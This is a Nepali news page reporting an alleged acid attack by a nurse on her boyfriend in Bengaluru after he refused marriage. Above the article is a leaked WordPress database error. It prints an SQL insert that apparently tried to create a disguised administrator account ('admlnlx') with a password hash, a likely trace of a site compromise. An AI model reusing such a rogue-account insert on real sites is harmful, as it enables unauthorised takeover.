WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvVs590QzD8yXe/Pp.9PcM07qlzu20.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 15:28:10', '', 'admlnlx', 'admlnlx')
भारत, माघ ५-
पुरुषले महिलाको अनुहारमा तेजाव हानेको समाचार अक्सर सुनिन्छ । तर भारतमा भने बिबाह गर्न इन्कार गरेको भन्दै एक युवतीले प्रेमीको अनुहारमा तेजाव आक्रमण गरेकी छन् ।पेशाले नर्श लिदिया यशपालमाथि ३२ बर्षीय प्रेमी जयकुमार पुरुषोत्तमको अनुहारमा तेजाव छर्कनुका साथै मेडिकल ब्लेडले आक्रमण गरेको आरोप छ ।
पुरुषोत्तमको तर्फबाट प्रहरीमा दिइएको उजुरीमा लिदियासँग उनको चार बर्षको प्रेम थियो र लिदिया उनीसँग विवाह गर्न चाहन्थिन् । तर उसले विवाह यो कारणले अस्वीकार गरिरहेको थियो कि अलग धर्म भएकाले उनका बुबाआमाले लिदियालाई अस्वीकार गर्दै आएका थिए ।
प्रहरीको उजुरीका अनुसार पुरुषोत्तमले लिदियासँग पछिल्लो तीन महिनादेखि सम्बर्कबिच्छेदको प्रयास गरेका थिए । र लिदिया यो सुनेर निक्कै रिसाएकी थिइन् की पुरुषोत्तम विवाहको लागि अर्की केटी खोजिरहेका छन् ।पश्चिम बैंगलुरुका पुलिस उपायुक्तका अनुसार महिलाले पुरुषमाथि एसिड आक्रमण गरेको पहिलो घटना हो ।